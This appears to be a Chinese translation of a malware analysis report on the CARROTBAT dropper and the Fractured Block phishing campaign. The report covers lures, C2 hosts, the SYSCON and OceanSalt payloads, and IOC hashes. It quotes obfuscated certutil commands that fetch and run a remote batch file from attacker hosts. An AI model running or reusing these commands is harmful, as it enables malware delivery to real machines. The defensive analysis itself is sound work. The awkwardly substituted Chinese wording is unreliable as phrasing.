CARROTBAT家族针对东南亚地区发起攻击

Unit 42近期发清楚明了一项针对与韩国和朝鲜地区进行的钓鱼活动，钓鱼内容环抱一系列主题展开，主要包括：加密泉币，加密泉币买卖营业和政治事故。根据被送达的恶意载荷中所包孕的有关信息，Unit 42将这个恶意软件家族命名为了CARROTBAT。

CARROTBAT家族的样本最早在2017年12月的一次进击中被发明的，这次进击是针对英国政府机构展开的，主要使用了SYSCON家族恶意软件，只管没有明确证据注解CARROTBAT在进击中被应用，然则钻研职员照样经由过程进击设备的行径重叠来确认出了CARROTBAT家族，并发清楚明了它与SYSCON家族系列软件的联系。而这次进击事故的主角SYSCON是一款简单的远程造访木马（RAT），它应用文件传输协议（FTP）进行收集通信，详细报道见于https://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/。

迄今为止，一共识别出了29种不合的CARROTBAT样本，此中包孕12种已确认的不合诱饵文件。这些样本于今年3月开始呈现，在以前的3个月内进行了大年夜量的活动。与先前送达的SYSCON家族恶意软件不合，新的进击活动送达了OceanSalt（https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf）家族恶意软件。我们将CARROTBAT及其送达的相关载荷合并称之为Fractured Block。

进击历程

2017年12月13日，yuri.sidorav@yandex[.]ru向英国政府机构内的高档职员发送了一封鱼叉钓鱼邮件。此电子邮件的主题是“我们会在没有先决前提的环境下与朝鲜对话”，此邮件的附件文件也应用了同样的命名要领。

在附件Word中显示了如下内容：

美国将“无前提地”与朝鲜对话

文章主要评论争论了美国与朝鲜之间的外交关系，并且引用了NKNews[.]org当天宣布的文章（文章链接为：https://www.nknews.org/2017/12/u-s-would-talk-with-north-korea-without-precondition-tillerson/ ）。被引用的文章内容为：

附件文档使用DDE破绽（破绽先容：https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/）履行了以下代码：

The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia

DDE破绽首次在2017年5月被使用于恶意进击。进击样本中包孕下载名为0_31.doc的远程可履行文件的敕令，文件被下载后以AAA.exe的文件名形式命名，并放在在受害者的％TEMP％目录中。被划定到SYSCON家族的恶意载荷经由过程FTP办事器与ftp.bytehost31[.]org via这个恶意办事器进行连接，以接管远程节制敕令。

经由过程对恶意样本中的域名881.000webhostapp[.]com进行关联，又关联出了一批样本，此中包括KONNI恶意软件系列样本和4个CARROTBAT恶意软件系列样本（64位可履行文件）。根据特性进行筛选，终极筛选出了29个不合样本。

Fractured Block进击

迄今为止，所有的CARROTBAT样本都是包孕在Fractured Block进击里的。CARROTBAT用于送达载荷来赞助进击者送达并打开一个嵌入式诱饵文件，然后履行一个敕令，该敕令将在目标机械高低载并运行一个有效负载。此恶意软件支持以下11种诱饵文档文件款式：

.doc

.docx

.eml

.hwp

.jpg

.pdf

.png

.ppt

.pptx

.xls

.xlsx

在打开嵌入式诱饵文档后，会在系统上履行以下肴杂敕令：

C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f https://881.000webhostapp[.]com/1.txt && ren 1.txt 1.bat && 1.bat && exit

此敕令将考试测验经由过程Microsoft Windows内置的certutil实用法度榜样下载并履行远程文件。

经由过程对根据行径判别所找到的29个样本的编译光阴戳进行钻研，发明它们均在2018年3月到2018年9月之间，此中的11个被用于了实际的进击历程。样本的编译光阴戳如下图所示：

针对韩国受害者的大年夜多半诱饵文件都有与加密泉币的主题相关。在此中的一个案例中，诱饵文件包孕了在COINVIL事情的小我咭片，该组织发布计划于2018年5月在菲律宾建立加密泉币买卖营业所。其他诱饵主题包括时势政治事故，如美国和朝鲜之间的关系，以及美国总统唐纳德特朗普造访新加坡峰会。CARROTBAT所送达的恶意载荷各不相同，在2018年3月到2018年7月时代，可以察看到所送达的多个SYSCON恶意样本，这些样本经由过程FTP与以下主机进行C2通信：

ftp.byethost7[.]com

ftp.byethost10[.]com

files.000webhost[.]com

从2018年6月开始，我们察看到CARROTBAT开始送达OceanSalt恶意软件。在撰写本文时，这些样本仍处于活动状态，并与61.14.210[.]72:7117进行C2通信。

与其他要挟活动的关联

CARROTBAT和KONNI恶意软件之间存在一些办事看重叠。KONNI是一种远程造访木马，已经生动了四年之久，具有广泛的功能，平日使用000webhost等免费收集托管办事供给商的办事器作为其C2地址。在撰写本文时，这个特定的恶意软件系列尚未被归类为一个家族，然则该软件的进击目标不停集中在东南亚地区。

上文反复提到的另一种关联是SYSCON恶意软件。这个恶意软件首次在2017年10月被报道，并且已经察看到了进击中供给了与朝鲜有关的诱饵文件。此款恶意软件平日对照简单，使用远程FTP办事器

[1] [2] [3]下一页

进行C2通信。鄙人面的恶意活动关联图中，黄色的表示KONNI，紫色的表示SYSCON。

该家族与OceanSalt恶意软件有效载荷也可能有必然关联。McAfee在2018年10月首次进行了进击报道，受害者包括韩国、美国和加拿大年夜。与McAfee申报中列出的样本信息一样，在Fractured Block 进击中察看到的OceanSalt样本应用与Comment Crew（别名APT1）相同的代码，然则钻研职员觉得这些相似的代码是差错的标志。Comment Crew应用的恶意软件已经生动了多年，是以钻研职员表示这次活动与Crew活动的关联性存疑。相关要挟活动的光阴重叠表：

结论

CARROTBAT是识别Fractured Block进击活动的关键。经由过程探求CARROTBAT，我们能够找到相关的OceanSalt，SYSCON和KONNI活动。因为这些活动具备一些特性重叠，是以我们狐疑这种要挟活动可能是由同一个进击组织提议的。然则，今朝没有确实证据。CARROTBAT恶意软件是一种较为独特的载荷送达器，虽然它支持各类类型的诱饵文件，并采纳基础的敕令肴杂，但它并不繁杂。

CARROTBAT技巧阐发

样本信息为：

MD5：3e4015366126dcdbdcc8b5c508a6d25c

SHA1：f459f9cfbd10b136cafb19cbc233a4c8342ad984

SHA256：aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de

文件类型：PE32可履行文件（GUI）Intel 80386，适用于MS Windows

编译光阴戳 2018-09-05 00:17:22 UTC

履行时，恶意软件将读取自身的着末8个字节。这些字节包括两个DWORD，它们既包孕嵌入的诱饵文档的长度，也包孕它的文件类型。

根据这些网络到的信息，CARROTBAT减去先前检索的8个字节后继承读取自身的结尾。数据包孕全部嵌入式诱饵文档，并写入与原始恶意软件相同的目录和文件名。然则会根据先前检索的文件类型值变动文件扩展名，对应值为：

在此样本中应用了.hwp文件扩展名的文档作为诱饵文档。在诱饵文件被放入到磁盘后，它将在一个新进程中被打开。随后会给受害者显示这个.hwp诱饵文档：BKN Bank加密泉币买卖营业的白皮书。

在显示此文档后，恶意软件将继承在新进程中履行以下敕令：

C: && cd %TEMP% && c^e^r^tutil -urlca^che -spl^it -f http://s8877.1apps[.]com/vip/1.txt && ren 1.txt 1.bat && 1.bat && exit

此敕令将应用内置的Microsoft Windows certutil敕令下载远程文件。在这个样本中，将检索以下脚本：

该脚本会反省受害者的操作系统，并应用certutil可履行文件再次下载响应的有效负载。

在本样本中，有效载荷经由过程base64进行编码，经由过程certutil进行解码。恶意载荷是一个CAB文件，在解压缩后，恶意软件会履行提取的install.bat脚本，着末删除原始文件并退出。

下载的CAB文件信息为：

MD5：a943e196b83c4acd9c5ce13e4c43b4f4

SHA1：e66e416f300c7efb90c383a7630c9cfe901ff9fd

SHA256：cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62

文件类型：Microsoft Cabinet归档数据，共181248字节，3个文件

上文提到的所删除的文件共有三个，分手是：

INSTALL.BAT（用于安装批处置惩罚脚本，认真将其他文件复制到C： Users Public Downloads并设置Run注册表项以确维持久性。它还认真在退出之前删除任何原始文件。）

DrvUpdate.dll（OceanSalt恶意软件）

winnet.ini（C2信息）

C2信息在外部winnet.ini文件中存储，并应用增量的XOR密钥进行编码。用Python编写的以下函数可解码此文件：

解码后，钻研职员发明此OceanSalt病毒考试测验经由过程端口7117与61.14.210 [.] 72进行通信。

IOC

CARROTBAT样本

d34aabf20ccd93df9d43838cea41a7e243009a3ef055966cb9dea75d84b2724d

8b6b4a0e0945c6daf3ebc8870e3bd37e54751f95162232d85dc0a0cc8bead9aa

26fc6fa6acc942d186a31dc62be0de5e07d6201bdff5d7b2f1a7521d1d909847

e218b19252f242a8f10990ddb749f34430d3d7697cbfb6808542f609d2cbf828

824f79a8ee7d8a23a0371fab83de44db6014f4d9bdea90b47620064e232fd3e3

70106ebdbf4411c32596dae3f1ff7bf192b81b0809f8ed1435122bc2a33a2e22

87c50166f2ac41bec7b0f3e3dba20c7264ae83b13e9a6489055912d4201cbdfc

ac23017efc19804de64317cbc90efd63e814b5bb168c300cfec4cfdedf376f4f

d965627a12063172f12d5375c449c3eef505fde1ce4f5566e27ef2882002b5d0

7d443434c302431734caf1d034c054ad80493c4c703d5aaeafa4a931a496b2ae

1142dcc02b9ef34dca2f28c22613a0489a653eb0aeafe1370ca4c00200d479e0

337b8c2aac80a44f4e7f253a149c65312bc952661169066fe1d4c113348cc27b

92b45e9a3f26b2eef4a86f3dae029f5821cffec78c6c64334055d75dbf2a62ef

42e18ef3aaadac5b40a37ec0b3686c0c2976d65c978a2b685fefe50662876ded

ba78f0a6ce53682942e97b5ad7ec76a2383468a8b6cd5771209812b6410f10cb

dca9bd1c2d068fc9c84a754e4dcf703629fbe2aa33a089cb50a7e33e073f5cea

7d8376057a937573c099e3afe2d8e4b8ec8cb17e46583a2cab1a4ac4b8be1c97

3cbccb059225669dcfdc7542ce28666e0b1a227714eaf4b16869808bffe90b96

aef92be267a05cbff83aec0f23d33dfe0c4cdc71f9a424f5a2e59ba62b7091de

2547b958f7725539e9bba2a1852a163100daa1927bb621b2837bb88007857a48

6c591dddd05a2462e252997dc9d1ba09a9d9049df564d00070c7da36e526a66a

22b16fa7af7b51880faceb33dd556242331daf7b7749cabd9d7c9735fb56aa10

3869c738fa80b1e127f97c0afdb6c2e1c15115f183480777977b8422561980dd

ba100e7bac8672b9fd73f2d0b7f419378f81ffb56830f6e27079cb4a064ba39a

e527ade24beacb2ef940210ba9acb21073e2b0dadcd92f1b8f6acd72b523c828

9fa69bdc731015aa7bdd86cd311443e6f829fa27a9ba0adcd49fa773fb5e7fa9

ffd1e66c2385dae0bb6dda186f004800eb6ceaed132aec2ea42b1ddcf12a5c4e

e3b45b2e5d3e37f8774ae22a21738ae345e44c07ff58f1ab7178a3a43590fddd

a0f53abde0d15497776e975842e7df350d155b8e63d872a914581314aaa9c1dc

SYSCON 载荷样本

5a2c53a20fd66467e87290f5845a5c7d6aa8d460426abd30d4a6adcffca06b8b

fceceb104bed6c8e85fff87b1bf06fde5b4a57fe7240b562a51727a37034f659

fa712f2bebf30592dd9bba4fc3befced4c727b85a036550fc3ac70d1965f8de5

da94a331424bc1074512f12d7d98dc5d8c5028821dfcbe83f67f49743ae70652

2efdd25a8a8f21c661aab2d4110cd7f89cf343ec6a8674ff20a37a1750708f27

62886d8b9289bd92c9b899515ff0c12966b96dd3e4b69a00264da50248254bb7

f27d640283372eb805df794ae700c25f789d77165bb98b7174ee03a617a566d4

0bb099849ed7076177aa8678de65393ef0d66e026ad5ab6805c1c47222f26358

f4c00cc0d7872fb756e2dc902f1a22d14885bf283c8e183a81b2927b363f5084

e8381f037a8f70d8fc3ee11a7bec98d6406a289e1372c8ce21cf00e55487dafc

1c8351ff968f16ee904031f6fba8628af5ca0db01b9d775137076ead54155968

2da750b50ac396a41e99752d791d106b686be10c27c6933f0d3afe762d6d0c48

5d1388c23c94489d2a166a429b8802d726298be7eb0c95585f2759cebad040cf

0490e7d24defc2f0a4239e76197f1cba50e7ce4e092080d2f7db13ea0f88120b

OceanSalt 载荷样本